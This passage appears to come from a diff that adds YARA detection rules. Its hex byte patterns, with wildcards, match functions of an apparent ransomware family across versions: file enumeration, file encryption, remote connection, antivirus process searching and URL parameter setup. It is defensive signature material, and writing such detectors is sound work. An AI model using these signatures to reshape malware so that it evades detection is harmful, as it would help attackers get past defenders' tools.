+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8B F0 6A ?? 89 74 24 ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? C7 03 ??
+            ?? ?? ?? 83 FE ?? 74 ?? 53 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4B ?? 33 F6 EB
+            ?? 8D A4 24 ?? ?? ?? ?? 90 51 FF 74 B4 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 73 ?? 50
+            6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 8B 3D ?? ??
+            ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 46 8D 4B ?? 83 FE ?? 72 ?? 8B 74 24 ?? 53 56 FF
+            15 ?? ?? ?? ?? 8D 4B ?? 85 C0 75 ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ??
+            ?? ?? 56 FF D7 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files_v2_1 = {
+            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? F7 D8 1B C0 40 75 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 3C 46 89 7D ?? FF D3 8D 85 ?? ??
+            ?? ?? 50 56 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0F 83 F8 ?? 75 ?? B8 ?? ?? ?? ??
+            5F 5E 5B 8B E5 5D C3 8B 7D ?? EB ?? 8D 9B ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D3 F6 85 ?? ??
+            ?? ?? ?? 74 ?? 83 7D ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 89 45 ?? 8B 47 ?? 6A ?? 89 45 ?? FF 15 ?? ?? ?? ?? 56 8B D8 68 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 6A ??
+            53 FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 45 ?? 8B 4D ?? EB ?? 83 BD ?? ?? ??
+            ?? ?? 0F 57 C0 66 0F 13 45 ?? 72 ?? 51 FF 75 ?? 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 89 55
+            ?? EB ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF 15 ?? ?? ??
+            ?? 8B 45 ?? 8B 4D ?? 01 0F 11 47 ?? 8B 45 ?? 3B 47 ?? 77 ?? 72 ?? 8B 45 ?? 3B 07 73
+            ?? 8B 45 ?? FF 00 8B 1D ?? ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33
+            C0 5B 8B E5 5D C3
+        }
+		$crypt_files_v2_1 = {
+            FF 15 ?? ?? ?? ?? 33 D2 89 44 24 ?? 89 44 24 ?? 8D 0C B7 8D 0C CD ?? ?? ?? ?? 85 C0
+            74 ?? 3B CB 73 ?? 8D 3C 01 89 44 24 ?? 89 7C 24 ?? 8B D1 EB ?? 89 54 24 ?? 8B F8 8B
+            4D ?? 8D 34 CD ?? ?? ?? ?? 85 C0 74 ?? 8D 0C 32 89 4C 24 ?? 3B CB 73 ?? 8B 54 24 ??
+            8B CF 89 7C 24 ?? 03 FE 89 7C 24 ?? EB ?? 33 C9 89 4C 24 ?? 8B 74 24 ?? 85 C0 74 ??
+            8D 04 F5 ?? ?? ?? ?? 03 C2 3B C3 72 ?? 33 FF 89 7C 24 ?? 8B 1D ?? ?? ?? ?? 85 C9 0F
+            84 ?? ?? ?? ?? 8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68
+            ?? ?? ?? ?? 52 FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ??
+            56 FF 74 24 ?? FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C6
+            ?? 03 C6 68 ?? ?? ?? ?? 50 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 C7
+            44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 74 24 ?? FF D3 40 85 F6 74 ?? 3B 44 24 ?? 73 ??
+            8D 0C 06 89 44 24 ?? 89 4C 24 ?? 89 74 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3
+            40 85 F6 74 ?? 03 44 24 ?? 3B 44 24 ?? 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33
+            F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 8B 7C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ??
+            74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6
+            FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? EB ?? 8D 49 ?? 8A 04 3E 3C ?? 74 ?? 3C ??
+            74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 8B 1D ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 56 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 3C 46 57 E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68
+            ?? ?? ?? ?? 57 FF D3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ??
+            FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34 47
+            FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33
+            C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 66 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 58 58 8D 44 24 ?? 50 57 FF
+            D3 8B 5C 24 ?? 8B 35 ?? ?? ?? ?? 53 FF D6 6A ?? C1 E0 ?? 83 C0 ?? 68 ?? ?? ?? ?? 50
+            6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B F8 53 89 7C 24 ?? FF D6 8D 04 C5 ?? ?? ?? ??
+            85 FF 74 ?? 3B 44 24 ?? 72 ?? 33 FF 53 FF D6 8B 0D ?? ?? ?? ?? 8B F0 89 74 24 ?? 85
+            C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 6A ?? 68 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ??
+            53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 5C 24 ?? 03 F6 8B D6 8B CB E8 ??
+            ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ??
+            ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 57 FF D3
+            6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D 48
+            ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33 F6
+            FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41
+            89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24 ??
+            6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 7C 24 ?? 8D 54 24 ?? 6A ?? 57 8B
+            CE C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 8B 44 24 ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 68 ?? ??
+            ?? ?? 6A ?? FF 74 24 ?? FF D3 33 F6 EB ?? 8B 4C 24 ?? 85 C9 74 ?? 8B 45 ?? 89 08 8B
+            44 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74
+            24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 EB ?? 8B 7C 24 ?? 83 7C 24 ?? ??
+            75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D3 BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 74 24 ??
+            FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B C6 5E 5B 8B E5 5D C3
+        }
+		$remote_connection_v2_1 = {
+            53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45 ?? ??
+            ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8 FF D6
+            89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15 ?? ??
+            ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
+            ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3
+            0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF 15 ??
+            ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83 EC ??
+            68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 FF 75 ?? 8B 75 ?? 8D 4D ?? 56 E8
+            ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? C7 45 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33
+            FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF
+            D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C7 5F
+            5E 5B 8B E5 5D C3
+        }
+		$search_antivirus_processes_v4_1_2 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ??
+            89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ??
+            ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ??
+            50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85
+            F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C3
+        }
+		$find_files_v4_1_2 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
+            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
+            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
+            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ??
+            ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ??
+            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6
+            44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ??
+            ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59
+            8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E
+            5B 8B E5 5D C3
+        }
+		$crypt_files_v4_1_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 89 4D ?? 33 DB 57 B9 ?? ?? ?? ?? 89 5D ?? 8B F2 E8
+            ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 84
+            ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE
+            ?? 0F 84 ?? ?? ?? ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 89 5D ?? 89
+            5D ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D
+            45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D
+            ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 81 F9 ?? ?? ?? ?? 6A ?? 5A 0F 42 C2 01 8F ?? ??
+            ?? ?? 8B 55 ?? 8D 8D ?? ?? ?? ?? 11 9F ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 FF 75 ?? 89
+            45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? 57 56 FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B 7D ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68
+            ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ??
+            ?? ?? 56 FF 15 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 33 C0 8D
+            48 ?? 89 4D ?? EB
+        }
+		$remote_connection_v4_1_2 = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
+            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
+            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
+            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
+            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF
+            15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B
+            E5 5D C2
+        }
+		$url_parameters_setup_v4_1_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 15 ?? ?? ?? ?? 33 FF 57 57 57 FF 15 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 57 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ??
+            ?? ?? ?? 83 EC ?? 33 DB 43 53 83 EC ?? 53 51 53 51 53 51 53 51 53 83 EC ?? 53 51 53
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ?? ?? 03 C0 A3 ?? ?? ?? ?? FF D6 03 C0 8B D0
+            E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 57 57 68 ?? ?? ?? ?? 57 57 FF 15 ?? ?? ?? ??
+            8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 BB ?? ?? ?? ?? 53
+            FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ??
+            FF D6 E8 ?? ?? ?? ?? 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? E8
+        }
+		$url_parameters_setup_v4 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF
+            15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 6A ?? FF 15 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? FF D6 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 8B D0 E8 ?? ?? ?? ?? 6A ?? FF 15
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ??
+            ?? FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6
+            68 ?? ?? ?? ?? FF D6 E8 ?? ?? ?? ?? E8
+        }
+		$search_antivirus_processes_v4 = {
+            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? FF D6 8B 5D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 03 C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? FF D6 8B F8 89 7D ?? 85 FF 74 ?? 6A ?? 6A ?? C7 07 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E
+            33 C0 5B 8B E5 5D C2 ?? ?? 33 C9 33 F6 57 50 89 4D ?? 89 4D ?? 89 4D ?? 89 75 ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 49 ?? 85 F6 0F 85 ?? ?? ?? ?? 83 C7 ?? EB
